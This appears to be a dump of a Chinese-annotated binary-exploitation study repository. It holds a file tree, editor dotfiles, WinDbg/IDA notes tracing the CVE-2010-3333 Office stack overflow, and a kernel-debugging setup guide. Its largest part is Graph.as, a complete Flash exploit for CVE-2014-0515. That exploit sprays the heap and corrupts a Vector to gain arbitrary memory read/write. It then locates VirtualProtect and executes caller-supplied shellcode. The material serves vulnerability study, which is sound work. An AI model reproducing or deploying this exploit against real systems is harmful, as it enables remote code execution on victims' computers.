├── .gitattributes ├── .gitignore ├── .vimrc ├── Exploit ├── cve-2010-3333 │ ├── MSO.DLL │ ├── study.md │ └── unpatch_fun.c └── cve-2014-0515 │ ├── Graph.as │ └── study.md ├── Kernel ├── Environment │ ├── README.md │ ├── busybox │ │ └── x86-busybox │ │ │ ├── init │ │ │ ├── linuxrc │ │ │ ├── null_dereference.ko │ │ │ └── prod.sh │ ├── initbusybox.sh │ ├── linux_source │ │ └── f1sh │ │ │ ├── .built-in.o.cmd │ │ │ ├── .sys_f1sh.o.cmd │ │ │ ├── Makefile │ │ │ └── sys_f1sh.c │ ├── run.sh │ └── src │ │ ├── Makefile │ │ └── poc.c └── README.md ├── Malware ├── Dll_Hook │ ├── Dll_Hook.sln │ ├── Dll_Hook │ │ ├── Dll_Hook.aps │ │ ├── Dll_Hook.cpp │ │ ├── Dll_Hook.h │ │ ├── Dll_Hook.rc │ │ ├── Dll_Hook.vcxproj │ │ ├── Dll_Hook.vcxproj.filters │ │ ├── Source.def │ │ └── resource.h │ ├── Dll_Hook_app0 │ │ ├── Dll_Hook_app0.vcxproj │ │ ├── Dll_Hook_app0.vcxproj.filters │ │ └── main.cpp │ └── README.md ├── README.md └── wannacry │ └── README.md ├── Pwn ├── README.md ├── docker_env │ ├── Docker.base │ ├── Dockerfile │ └── README.md ├── examples │ ├── README.md │ ├── dl_resolve │ │ ├── README.md │ │ └── lctf_Pwn-100 │ │ │ ├── README.md │ │ │ ├── pwn1003s4de5rf76tg87yhu │ │ │ ├── pwn1003s4de5rf76tg87yhu.i64 │ │ │ ├── reference.py │ │ │ └── solve.py │ ├── heap │ │ ├── house_of_orange │ │ │ ├── README.md │ │ │ ├── houseoforange │ │ │ ├── houseoforange.i64 │ │ │ ├── libc.so.6_375198810bb39e6593a968fcbcf6556789026743 │ │ │ ├── libc.so.i64 │ │ │ └── template.py │ │ └── unlink │ │ │ ├── README.md │ │ │ ├── libc.so.6 │ │ │ ├── libc.so.6.i64 │ │ │ ├── payload.py │ │ │ ├── refer_exp.py │ │ │ ├── shellman │ │ │ ├── shellman.i64 │ │ │ └── unlink.md │ ├── rop_64 │ │ ├── exp4 │ │ ├── level4 │ │ ├── linux_64_rop │ │ ├── linux_64_rop.c │ │ ├── linux_64_sh.c │ │ ├── lv4.py │ │ ├── pattern.py │ │ └── payload │ ├── rop_chain │ │ ├── README.md │ │ ├── rop_test64.py │ │ └── unexploitable │ ├── srop │ │ ├── README.md │ │ ├── sh_exp.py │ │ └── smallest │ └── template.py ├── pwn_pwn.jpg └── socat_pwn.sh ├── README.md ├── Reverse ├── README.md ├── cumt2016_re3 │ ├── 03.py │ ├── README.md │ ├── reverse03.exe │ └── reverse03.idb └── driver │ ├── README.md │ └── vmmwindbg.png └── pic2ascii.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | -------------------------------------------------------------------------------- /.vimrc: -------------------------------------------------------------------------------- 1 | 2 | set nocompatible " be iMproved, required 3 | filetype off " required 4 | 5 | " set the runtime path to include Vundle and initialize 6 | set rtp+=~/.vim/bundle/Vundle.vim 7 | call vundle#begin() 8 | " alternatively, pass a path where Vundle should install plugins 9 | "call vundle#begin('~/some/path/here') 10 | 11 | " let Vundle manage Vundle, required 12 | Plugin 'VundleVim/Vundle.vim' 13 | 14 | " The following are examples of different formats supported. 15 | " Keep Plugin commands between vundle#begin/end. 16 | " plugin on GitHub repo 17 | Plugin 'tpope/vim-fugitive' 18 | " plugin from http://vim-scripts.org/vim/scripts.html 19 | " Plugin 'L9' 20 | " Git plugin not hosted on GitHub 21 | Plugin 'git://git.wincent.com/command-t.git' 22 | " git repos on your local machine (i.e. when working on your own plugin) 23 | Plugin 'file:///home/gmarik/path/to/plugin' 24 | " The sparkup vim script is in a subdirectory of this repo called vim. 25 | " Pass the path to set the runtimepath properly. 26 | Plugin 'rstacruz/sparkup', {'rtp': 'vim/'} 27 | " Install L9 and avoid a Naming conflict if you've already installed a 28 | " different version somewhere else. 29 | " Plugin 'ascenator/L9', {'name': 'newL9'} 30 | 31 | " ================ Mine Plugin ============ 32 | " NERDTree 33 | Bundle 'scrooloose/nerdtree' 34 | " display button infomation 35 | Plugin 'bling/vim-airline' 36 | " indent lines 37 | Plugin 'Yggdroot/indentLine' 38 | " ranbow parentheses 39 | Plugin 'luochen1990/rainbow' 40 | " icon 41 | Plugin 'ryanoasis/vim-devicons' 42 | 43 | " All of your Plugins must be added before the following line 44 | call vundle#end() " required 45 | filetype plugin indent on " required 46 | " To ignore plugin indent changes, instead use: 47 | "filetype plugin on 48 | " 49 | " Brief help 50 | " :PluginList - lists configured plugins 51 | " :PluginInstall - installs plugins; append `!` to update or just :PluginUpdate 52 | " :PluginSearch foo - searches for foo; append `!` to refresh local cache 53 | " :PluginClean - confirms removal of unused plugins; append `!` to auto-approve removal 54 | " 55 | " see :h vundle for more details or wiki for FAQ 56 | " Put your non-Plugin stuff after this line 57 | " 58 | 59 | " --------------------- plugin 设置 --------------------------- 60 | let g:vim_markdown_folding_disabled = 1 61 | " 在 vim 启动的时候默认开启 NERDTree(autocmd 可以缩写为 au) 62 | autocmd VimEnter * NERDTree 63 | " 设置 NERDTree宽度 64 | let NERDTreeWinSize=25 65 | " 自动关闭tree 66 | autocmd bufenter * if (winnr("$") == 1 && exists("b:NERDTree") && b:NERDTree.isTabTree()) | q | endif 67 | " 是否显示隐藏文件 68 | let NERDTreeShowHidden=1 69 | " 显示Bookmark 70 | "let NERDTreeShowBookmarks=1 71 | " rigth tree 72 | let NERDTreeWinPos="right" 73 | " indent 74 | let g:indentLine_enabled = 1 75 | let g:indentLine_setColors = 0 76 | let g:indentLine_color_term = 239 77 | let g:indentLine_char = ' ' 78 | " vim-dev icon 79 | set encoding=utf8 80 | let g:airline_powerline_fonts = 1 81 | " ranbow 82 | let g:rainbow_active = 1 "0 if you want to enable it later via :RainbowToggle 83 | 84 | " --------------------- 个人基本设置 --------------------------- 85 | " delete key set for brew install vim in mac 86 | set backspace=indent,eol,start 87 | " 设置行标 88 | set number 89 | " 设置空格折叠快捷键 90 | nnoremap za 91 | " 开启语法高亮 92 | syntax on 93 | " 允许指定语法高亮方案替换默认的高亮方案 94 | syntax on 95 | " 自动适应不同语言的缩进 96 | filetype on 97 | filetype plugin on 98 | filetype indent on 99 | " 制表符转换为空格 100 | set expandtab 101 | " 设置编辑时制表符占空格数 102 | set tabstop=4 103 | " 设置格式化时制表符占空格数 104 | set shiftwidth=4 105 | " 突出显示当前行 106 | "set cursorline 107 | " 突出显示当前列 108 | "set cursorcolumn 109 | 110 | 111 | -------------------------------------------------------------------------------- /Exploit/cve-2010-3333/MSO.DLL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Exploit/cve-2010-3333/MSO.DLL -------------------------------------------------------------------------------- /Exploit/cve-2010-3333/study.md: -------------------------------------------------------------------------------- 1 | # CVE-2010-3333 2 | 3 | 4 | ## windbg 5 | 6 | ``` 7 | This exception may be expected and handled. 8 | eax=0000c8ac ebx=05000000 ecx=00001ab5 edx=00000000 esi=11045de4 edi=00130000 9 | eip=30ed442c esp=0012a200 ebp=0012a238 iopl=0 nv up ei pl nz na pe nc 10 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 11 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll - 12 | mso!Ordinal1246+0x16b0: 13 | 14 | !address edi 查看edi的值 15 | db esp 16 | lmm mso v 查看mso模块详细信息 17 | ``` 18 | eip指向30ed442c 19 | 20 | IDA打开mso.dll之后 21 | ``` 22 | .text:30ED4406 sub_30ED4406 proc near ; DATA XREF: .text:30DA33F4o 23 | .text:30ED4406 24 | .text:30ED4406 arg_0 = dword ptr 4 25 | .text:30ED4406 arg_4 = dword ptr 8 26 | .text:30ED4406 arg_8 = dword ptr 0Ch 27 | .text:30ED4406 28 | .text:30ED4406 push edi 29 | .text:30ED4407 mov edi, [esp+4+arg_4] 30 | .text:30ED440B test edi, edi 31 | .text:30ED440D jz short loc_30ED4436 32 | .text:30ED440F mov eax, [esp+4+arg_0] 33 | .text:30ED4413 mov ecx, [eax+8] 34 | .text:30ED4416 and ecx, 0FFFFh 35 | .text:30ED441C push esi 36 | .text:30ED441D mov esi, ecx 37 | .text:30ED441F imul esi, [esp+8+arg_8] 38 | .text:30ED4424 add esi, [eax+10h] 39 | .text:30ED4427 mov eax, ecx 40 | .text:30ED4429 shr ecx, 2 41 | .text:30ED442C rep movsd //循环存取 导致溢出 42 | .text:30ED442E mov ecx, eax 43 | .text:30ED4430 and ecx, 3 44 | .text:30ED4433 rep movsb 45 | .text:30ED4435 pop esi 46 | ``` 47 | bp 30ed442c
48 | 之后运行,查看栈回溯
49 | ``` 50 | 0:000> kb 打印前三个函数参数的当前调用堆栈 51 | ChildEBP RetAddr Args to Child 52 | WARNING: Stack unwind information not available. Following frames may be wrong. 53 | 0012a238 30f0b56b 0012a3a4 00000000 ffffffff mso!Ordinal1246+0x16b0 当前的call 54 | 0012a268 30f0b4f9 0012a3f0 0012a3a4 00000000 mso!Ordinal1273+0x2581 前一个call 55 | 0012a4b4 30d4d795 00000000 0012a4f4 00000000 mso!Ordinal1273+0x250f 56 | 0012a4dc 30d4d70d 30d4d5a8 01551a48 01551a80 mso!Ordinal5575+0xf9 57 | 0012a4e0 30d4d5a8 01551a48 01551a80 01551930 mso!Ordinal5575+0x71 58 | 0012a4e4 01551a48 01551a80 01551930 30dce40c mso!Ordinal4099+0xf5 59 | 0012a4e8 01551a80 01551930 30dce40c 00000000 0x1551a48 60 | 0012a4ec 01551930 30dce40c 00000000 01551694 0x1551a80 61 | 0012a4f0 30dce40c 00000000 01551694 0012b2a0 0x1551930 62 | 0012a4f4 00000000 01551694 0012b2a0 00000000 mso!Ordinal2940+0x1588c 63 | ``` 64 | ub mso!Ordinal1273+0x2581 查看对应地址指令
65 | ``` 66 | mso!Ordinal1273+0x256d: 67 | 30f0b557 23c1 and eax,ecx 68 | 30f0b559 50 push eax 69 | 30f0b55a 8d47ff lea eax,[edi-1] 70 | 30f0b55d 50 push eax 71 | 30f0b55e 8b4508 mov eax,dword ptr [ebp+8] 72 | 30f0b561 6a00 push 0 73 | 30f0b563 ff750c push dword ptr [ebp+0Ch] 74 | 30f0b566 e857000000 call mso!Ordinal1273+0x25d8 (30f0b5c2) 75 | ``` 76 | 77 | bp 30f0b5c2
78 | 然后单步一直跟
79 | ``` 80 | 0:000> p 81 | eax=0000c8ac ebx=05000000 ecx=0000322b edx=00000000 esi=1104000c edi=0012a228 82 | eip=30ed442c esp=0012a200 ebp=0012a238 iopl=0 nv up ei pl nz na pe nc 83 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 84 | mso!Ordinal1246+0x16b0: 85 | 30ed442c f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 86 | 0:000> db esi 87 | 1104000c 41 61 30 41 61 31 41 61-32 41 61 33 41 61 34 41 Aa0Aa1Aa2Aa3Aa4A 88 | 1104001c 61 35 41 61 36 41 61 37-41 61 38 41 61 39 41 62 a5Aa6Aa7Aa8Aa9Ab 89 | 1104002c 30 41 62 31 41 62 32 41-62 33 41 62 34 41 62 35 0Ab1Ab2Ab3Ab4Ab5 90 | 1104003c 41 62 36 41 62 37 41 62-38 41 62 39 41 63 30 41 Ab6Ab7Ab8Ab9Ac0A 91 | 1104004c 63 31 41 63 32 41 63 33-41 63 34 41 63 35 41 63 c1Ac2Ac3Ac4Ac5Ac 92 | 1104005c 36 41 63 37 41 63 38 41-63 39 41 64 30 41 64 31 6Ac7Ac8Ac9Ad0Ad1 93 | 1104006c 41 64 32 41 64 33 41 64-34 41 64 35 41 64 36 41 Ad2Ad3Ad4Ad5Ad6A 94 | 1104007c 64 37 41 64 38 41 64 39-41 65 30 41 65 31 41 65 d7Ad8Ad9Ae0Ae1Ae 95 | 0:000> ? ebp-edi ;用来计算寄存器差值 96 | Evaluate expression: 16 = 00000010 97 | 这个ebp由ida查看可知 保存的是栈的地址 98 | ;ebp一直保存上一个esp 99 | .text:30F0B5C2 push ebp 100 | .text:30F0B5C3 mov ebp, esp 101 | .text:30F0B5C5 sub esp, 14h 102 | .text:30F0B5C8 cmp [ebp+arg_10], 0 103 | ``` 104 | 105 | 106 | -------------------------------------------------------------------------------- /Exploit/cve-2010-3333/unpatch_fun.c: -------------------------------------------------------------------------------- 1 | char __userpurge sub_30F0B5C2(int a1, int a2, int a3, int a4, int a5, int a6) 2 | { 3 | int v6; // ecx@14 4 | int v7; // esi@2 5 | int v8; // eax@2 6 | char result; // al@2 7 | int v10; // eax@4 8 | bool v11; // zf@4 9 | bool v12; // sf@4 10 | unsigned __int8 v13; // of@4 11 | int v14; // [sp+4h] [bp-14h]@5 12 | int v15; // [sp+8h] [bp-10h]@2 13 | int v16; // [sp+Ch] [bp-Ch]@2 14 | int v17; // [sp+10h] [bp-8h]@2 15 | char v18; // [sp+17h] [bp-1h]@4 16 | int v19; // [sp+24h] [bp+Ch]@4 17 | 18 | if ( a6 ) 19 | { 20 | v7 = *(_DWORD *)(sub_30D29EA3(*(_DWORD *)(a1 + 8)) + 100); 21 | v17 = 0; 22 | v8 = *(_DWORD *)v7; 23 | v16 = 83886080; 24 | (*(void (__stdcall **)(int, int *, int))(v8 + 28))(v7, &v15, a3); 25 | result = sub_30F0B7AF(a2, a5 != 0 ? (int)&v17 : 0, a6); 26 | if ( result ) 27 | { 28 | if ( v17 ) 29 | { 30 | (*(void (__stdcall **)(int, signed int))(*(_DWORD *)v17 + 16))(v17, 83886080); 31 | v16 = 100663296; 32 | } 33 | v10 = a3 + 1; 34 | v13 = __OFSUB__(a3 + 1, a4); 35 | v11 = a3 + 1 == a4; 36 | v12 = a3 + 1 - a4 < 0; 37 | v18 = 0; 38 | v19 = a3 + 1; 39 | if ( (unsigned __int8)(v12 ^ v13) | v11 ) 40 | { 41 | while ( 1 ) 42 | { 43 | (*(void (__stdcall **)(int, int *, int))(*(_DWORD *)v7 + 28))(v7, &v15, v10); 44 | v14 = 0; 45 | if ( !(unsigned __int8)sub_30F0B7AF(a2, a5 != 0 ? (int)&v14 : 0, a6) ) 46 | break; 47 | if ( v14 ) 48 | { 49 | (*(void (__stdcall **)(int, int))(*(_DWORD *)v14 + 16))(v14, v16); 50 | v16 += 16777216; 51 | if ( !(unsigned __int8)sub_30E842A0(v14) ) 52 | break; 53 | } 54 | ++v19; 55 | if ( v19 > a4 ) 56 | goto LABEL_15; 57 | v10 = v19; 58 | } 59 | } 60 | else 61 | { 62 | LABEL_15: 63 | if ( a5 ) 64 | { 65 | v6 = v17; 66 | v17 = 0; 67 | *(_DWORD *)a5 = v6; 68 | } 69 | v18 = 1; 70 | } 71 | if ( v17 ) 72 | (*(void (__stdcall **)(int))(*(_DWORD *)v17 + 4))(v17); 73 | result = v18; 74 | } 75 | } 76 | else 77 | { 78 | sub_3144D83D(); 79 | result = 0; 80 | } 81 | return result; 82 | } -------------------------------------------------------------------------------- /Exploit/cve-2014-0515/Graph.as: -------------------------------------------------------------------------------- 1 | //compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf 2 | package { 3 | import flash.display.Sprite; 4 | import flash.utils.ByteArray; 5 | import flash.display.Shader; 6 | import flash.system.Capabilities; 7 | import flash.net.FileReference; 8 | import flash.utils.Endian; 9 | import __AS3__.vec.Vector; 10 | import __AS3__.vec.*; 11 | import flash.display.LoaderInfo; 12 | 13 | public class Graph extends Sprite { 14 | 15 | static var counter:uint = 0; 16 | 17 | protected var Shad:Class; 18 | var shellcode_byte_array:ByteArray; 19 | var aaab:ByteArray; 20 | var shellcodeObj:Array; 21 | 22 | public function Graph(){ 23 | var tweaked_vector:* = undefined; 24 | var tweaked_vector_address:* = undefined; 25 | var shader:Shader; 26 | var flash_memory_protect:Array; 27 | var code_vectors:Array; 28 | var address_code_vector:uint; 29 | var address_shellcode_byte_array:uint; 30 | this.Shad = Graph_Shad; 31 | super(); 32 | shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(","); 33 | var i:* = 0; 34 | var j:* = 0; 35 | 36 | // Just one try 37 | counter++; 38 | if (counter > 1) 39 | { 40 | return; 41 | }; 42 | 43 | // Memory massage 44 | var array_length:uint = 0x10000; 45 | var vector_size:uint = 34; 46 | var array:Array = new Array(); 47 | // 将碎片化内存占满 48 | i = 0; 49 | while (i < array_length) 50 | { 51 | array[i] = new Vector.(1); 52 | i++; 53 | }; 54 | // 申请0x90字节块 55 | i = 0; 56 | while (i < array_length) 57 | { 58 | array[i] = new Vector.(vector_size); 59 | i++; 60 | }; 61 | // 改变长度=0 62 | i = 0; 63 | while (i < array_length) 64 | { 65 | array[i].length = 0; 66 | i++; 67 | }; 68 | /* 69 | * 制造小hole 70 | * 71 | */ 72 | i = 0x0200; 73 | while (i < array_length) 74 | { 75 | array[(i - (2 * (j % 2)))].length = 0x0100; 76 | i = (i + 28); 77 | j++; 78 | }; 79 | 80 | // Overflow and Search for corrupted vector 81 | var corrupted_vector_idx:uint; 82 | var shadba:ByteArray = (new this.Shad() as ByteArray); 83 | shadba.position = 232; 84 | if (Capabilities.os.indexOf("Windows 8") >= 0) 85 | { 86 | shadba.writeUnsignedInt(2472); 87 | }; 88 | shadba.position = 0; 89 | while (1) 90 | { 91 | shader = new Shader(); 92 | try 93 | { 94 | shader.byteCode = (new this.Shad() as ByteArray); 95 | } catch(e) 96 | { 97 | }; 98 | i = 0; 99 | while (i < array_length) 100 | { 101 | if (array[i].length > 0x0100) 102 | { 103 | corrupted_vector_idx = i; 104 | break; 105 | }; 106 | i++; 107 | }; 108 | if (i != array_length) 109 | { 110 | if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break; 111 | }; 112 | array.push(new Vector.(vector_size)); 113 | }; 114 | 115 | // Tweak the vector following the corrupted one 116 | array[corrupted_vector_idx][vector_size] = 0x40000001; 117 | tweaked_vector = array[(corrupted_vector_idx + 1)]; 118 | 119 | // repair the corrupted vector by restoring its 120 | // vector object pointer and length 121 | var vector_obj_addr:* = tweaked_vector[0x3fffffff]; 122 | tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr; 123 | tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size; 124 | i = 0; 125 | var val:uint; 126 | while (true) 127 | { 128 | val = tweaked_vector[(0x40000000 - i)]; 129 | if (val == 0x90001B) break; 130 | i++; 131 | }; 132 | tweaked_vector_address = 0; 133 | if (tweaked_vector[((0x40000000 - i) - 4)] > 0) 134 | { 135 | tweaked_vector[4] = 0x41414141; 136 | tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8); 137 | }; 138 | 139 | // More memory massage, fill an array of FileReference objects 140 | var file_reference_array:Array = new Array(); 141 | i = 0; 142 | while (i < 64) 143 | { 144 | file_reference_array[i] = new FileReference(); 145 | i++; 146 | }; 147 | 148 | var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address); 149 | var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20)); 150 | var do_it:Boolean = true; 151 | var memory_protect_ptr:uint; 152 | var aaaq:uint; 153 | if (do_it) 154 | { 155 | flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address); 156 | memory_protect_ptr = flash_memory_protect[0]; 157 | aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment 158 | code_vectors = this.createCodeVectors(0x45454545, 0x90909090); 159 | address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545); 160 | this.fillCodeVectors(code_vectors); 161 | tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call 162 | tweaked_vector[4] = aaaq; 163 | tweaked_vector[0] = 0x1000; // Length 164 | tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address 165 | 166 | // 10255e21 ff5014 call dword ptr [eax+14h] ds:0023:41414155=???????? 167 | this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8)); 168 | 169 | // 1) Set memory as executable 170 | i = 0; 171 | while (i < 64) 172 | { 173 | file_reference_array[i].cancel(); 174 | i++; 175 | }; 176 | 177 | // 2) Execute shellcode 178 | tweaked_vector[7] = address_code_vector; 179 | i = 0; 180 | while (i < 64) 181 | { 182 | file_reference_array[i].cancel(); 183 | i++; 184 | }; 185 | 186 | // Restore FileReference cancel function pointer 187 | // Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads 188 | this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address); 189 | }; 190 | } 191 | 192 | // returns the integer at memory address 193 | // vector: vector with tweaked length 194 | // vector_address: vector's memory address 195 | // address: memory address to read 196 | function read_memory(vector:Vector., vector_address:uint, address:uint):uint{ 197 | if (address >= vector_address) 198 | { 199 | return (vector[((address - vector_address) / 4)]); 200 | }; 201 | return (vector[(0x40000000 - ((vector_address - address) / 4))]); 202 | } 203 | 204 | function write_memory(vector:Vector., vector_address:uint, address:uint, value:uint){ 205 | if (address >= vector_address) 206 | { 207 | vector[((address - vector_address) / 4)] = value; 208 | } else 209 | { 210 | vector[(0x40000000 - ((vector_address - address) / 4))] = value; 211 | }; 212 | } 213 | 214 | function findFlashMemoryProtect(vector:*, vector_address:*):Array{ 215 | var content:uint; 216 | var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); 217 | var index:uint; 218 | var memory_protect_ptr:uint; 219 | var _local_6:uint; 220 | if (allocation >= vector_address) 221 | { 222 | index = ((allocation - vector_address) / 4); 223 | } else 224 | { 225 | index = (0x40000000 - ((vector_address - allocation) / 4)); 226 | }; 227 | 228 | //push 1 ; 6a 01 229 | //push dword ptr [eax-8] ; ff 70 f8 230 | //push dword ptr [eax-4] ; ff 70 fc 231 | //call sub_1059DD00 // Will do VirtualProtect 232 | var offset:uint; 233 | while (1) 234 | { 235 | index--; 236 | content = vector[index]; 237 | if (content == 0xfff870ff) 238 | { 239 | offset = 2; 240 | break; 241 | }; 242 | if (content == 0xf870ff01) 243 | { 244 | offset = 1; 245 | break; 246 | }; 247 | if (content == 0x70ff016a) 248 | { 249 | content = vector[(index + 1)]; 250 | if (content == 0xfc70fff8) 251 | { 252 | offset = 0; 253 | break; 254 | }; 255 | } else 256 | { 257 | if (content == 0x70fff870) 258 | { 259 | offset = 3; 260 | break; 261 | }; 262 | }; 263 | }; 264 | 265 | memory_protect_ptr = ((vector_address + (4 * index)) - offset); 266 | index--; 267 | var content_before:uint = vector[index]; 268 | 269 | if (content_before == 0x16a0424) 270 | { 271 | return ([memory_protect_ptr, _local_6]); 272 | }; 273 | if (content_before == 0x6a042444) 274 | { 275 | return ([memory_protect_ptr, _local_6]); 276 | }; 277 | if (content_before == 0x424448b) 278 | { 279 | return ([memory_protect_ptr, _local_6]); 280 | }; 281 | if (content_before == 0xff016a04) 282 | { 283 | return ([memory_protect_ptr, _local_6]); 284 | }; 285 | _local_6 = (memory_protect_ptr - 6); 286 | 287 | while (1) 288 | { 289 | index--; 290 | content = vector[index]; 291 | if (content == 0x850ff50) 292 | { 293 | if (uint(vector[(index + 1)]) == 0x5e0cc483) 294 | { 295 | offset = 0; 296 | break; 297 | }; 298 | }; 299 | content = (content & 0xFFFFFF00); 300 | if (content == 0x50FF5000) 301 | { 302 | if (uint(vector[(index + 1)]) == 0xcc48308) 303 | { 304 | offset = 1; 305 | break; 306 | }; 307 | }; 308 | content = (content & 0xFFFF0000); 309 | if (content == 0xFF500000) 310 | { 311 | if (uint(vector[(index + 1)]) == 0xc4830850) 312 | { 313 | if (uint(vector[(index + 2)]) == 0xc35d5e0c) 314 | { 315 | offset = 2; 316 | break; 317 | }; 318 | }; 319 | }; 320 | content = (content & 0xFF000000); 321 | if (content == 0x50000000) 322 | { 323 | if (uint(vector[(index + 1)]) == 0x830850ff) 324 | { 325 | if (uint(vector[(index + 2)]) == 0x5d5e0cc4) 326 | { 327 | offset = 3; 328 | break; 329 | }; 330 | }; 331 | }; 332 | }; 333 | memory_protect_ptr = ((vector_address + (4 * index)) + offset); 334 | return ([memory_protect_ptr, _local_6]); 335 | } 336 | 337 | // vector: vector with tweaked length 338 | // address: memory address of vector data 339 | function find_file_ref_vtable(vector:*, address:*):uint{ 340 | var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c)); 341 | 342 | // Find an allocation of size 0x2a0 343 | var allocation_size:uint; 344 | while (true) 345 | { 346 | allocation_size = this.read_memory(vector, address, (allocation + 8)); 347 | if (allocation_size == 0x2a0) break; 348 | if (allocation_size < 0x2a0) 349 | { 350 | allocation = (allocation + 0x24); // next allocation 351 | } else 352 | { 353 | allocation = (allocation - 0x24); // prior allocation 354 | }; 355 | }; 356 | var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc)); 357 | while (true) 358 | { 359 | if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break; 360 | if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break; 361 | allocation_contents = this.read_memory(vector, address, (allocation_contents + 8)); 362 | }; 363 | return (allocation_contents); 364 | } 365 | 366 | // Returns pointer to the nops in one of the allocated code vectors 367 | function findCodeVector(vector:*, vector_address:*, mark:*):uint{ 368 | var allocation_size:uint; 369 | var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); 370 | while (true) 371 | { 372 | allocation_size = this.read_memory(vector, vector_address, (allocation + 8)); 373 | if (allocation_size == 0x7f0) break; // Code Vector found 374 | allocation = (allocation + 0x24); // next allocation 375 | }; 376 | 377 | // allocation contents should be the vector code, search for the mark 0x45454545 378 | var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc)); 379 | while (true) 380 | { 381 | if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break; 382 | allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation 383 | }; 384 | return ((allocation_contents + 0x2c)); 385 | } 386 | 387 | // create 8 vectors of size 0x7f0 inside an array to place shellcode 388 | function createCodeVectors(mark:uint, nops:uint){ 389 | var code_vectors_array:Array = new Array(); 390 | var i:* = 0; 391 | while (i < 8) 392 | { 393 | code_vectors_array[i] = new Vector.(((0x7f0 / 4) - 8)); // new Vector.(0x1f4) 394 | code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4 395 | code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4 396 | i++; 397 | }; 398 | return (code_vectors_array); 399 | } 400 | 401 | 402 | // Fill with the code vectors with the shellcode 403 | function fillCodeVectors(array_code_vectors:Array) { 404 | var i:uint = 0; 405 | var sh:uint=1; 406 | 407 | while(i < array_code_vectors.length) 408 | { 409 | for(var u:String in shellcodeObj) 410 | { 411 | array_code_vectors[i][sh++] = Number(shellcodeObj[u]); 412 | } 413 | i++; 414 | sh = 1; 415 | } 416 | } 417 | } 418 | }//package -------------------------------------------------------------------------------- /Exploit/cve-2014-0515/study.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Exploit/cve-2014-0515/study.md -------------------------------------------------------------------------------- /Kernel/Environment/README.md: -------------------------------------------------------------------------------- 1 | # Ring0 Environment 2 | 3 | ## Environment 4 | 5 | 手动下载需要版本的源码,然后进行编译。(遇到问题google基本能解决) 6 | 7 | 8 | ### qemu-system 9 | 10 | 要让qemu能跑起来,并调试内核,需要 11 | ```bash 12 | qemu-system-i386 -nographic -kernel ./linux-2.6.32.1/arch/i386/boot/bzImage -append "console=ttyS0" -initrd ./busybox-1.19.4/initramfs-busybox-x86.cpio.gz -gdb tcp::1234 -S 13 | ``` 14 | 15 | 具体操作: 16 | 1. `gdb vmlinux`(vmlinux是编译linux的时候产生的符合表),然后`target remote localhost:1234` 17 | 2. 启动`run.sh`,也就是启动`qemu`虚拟机 18 | 3. 在gdb下断点,然后就可以调试了 19 | 20 | 21 | ## Ref 22 | 